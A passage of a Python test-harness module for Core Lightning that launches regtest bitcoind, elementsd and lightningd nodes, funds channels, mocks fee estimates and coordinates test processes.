raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0, to_addr=None):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
if to_addr is None:
to_addr = self.rpc.getnewaddress()
return self.rpc.generatetoaddress(numblocks, to_addr)
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
Also validates (optional) schemas for us.
"""
def __init__(self, socket_path, executor=None, logger=logging,
patch_json=True, jsonschemas={}):
super().__init__(
socket_path,
executor,
logger,
patch_json,
)
self.jsonschemas = jsonschemas
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
if method in self.jsonschemas:
self.jsonschemas[method].validate(res)
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
jsonschemas={},
valgrind_plugins=True,
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor, jsonschemas=jsonschemas)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
self.daemon.opts["dev-no-plugin-checksum"] = None
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if EXPERIMENTAL_DUAL_FUND:
self.daemon.opts["experimental-dual-fund"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
trace_skip_pattern = '*python*,*bitcoin-cli*,*elements-cli*'
if not valgrind_plugins:
trace_skip_pattern += ',*plugins*'
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip={}'.format(trace_skip_pattern),
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
res = self.rpc.fundchannel(remote_node.info['id'], capacity)
if confirm or wait_for_announce:
self.bitcoin.generate_block(1, wait_for_mempool=res['txid'])
if wait_for_announce:
self.bitcoin.generate_block(5)
wait_for(lambda: ['alias' in e for e in self.rpc.listnodes(remote_node.info['id'])['nodes']])
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': res['tx']}
def fundwallet(self, sats, addrtype="p2sh-segwit", mine_block=True):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
if mine_block:
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
# Tell the node to equally dual-fund the channel
remote_node.rpc.call('funderupdate', {'policy': 'match',
'policy_mod': 100,
'fuzz_percent': 0})
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
res = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))
blockid = self.bitcoin.generate_block(1, wait_for_mempool=res['txid'])[0]
# Generate the scid.
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
return '{}x{}x{}'.format(self.bitcoin.rpc.getblockcount(), txnum, res['outnum'])
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
blockid = self.bitcoin.generate_block(1, wait_for_mempool=res['txid'])[0]
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
scid = "{}x{}x{}".format(self.bitcoin.rpc.getblockcount(),
txnum, res['outnum'])
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=TIMEOUT):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
inv = dst.rpc.invoice(amt, label, label)
# FIXME: pre 0.10.1 invoice calls didn't have payment_secret field
psecret = dst.rpc.decodepay(inv['bolt11'])['payment_secret']
rhash = inv['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash, payment_secret=psecret)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# Make sure they're all settled, in case we quickly mine blocks!
dst.wait_for_htlcs()
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [6, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [12, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler, jsonschemas):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
self.jsonschemas = jsonschemas
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip',
'start',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
# Only trace one random node's plugins, to avoid OOM.
if SLOW_MACHINE:
valgrind_plugins = [False] * num_nodes
valgrind_plugins[random.randint(0, num_nodes - 1)] = True
else:
valgrind_plugins = [True] * num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts,
valgrind_plugins=valgrind_plugins[i]
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
jsonschemas=self.jsonschemas,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel, wait_for_announce waits for channel and node announcements"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1, wait_for_mempool=txids)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
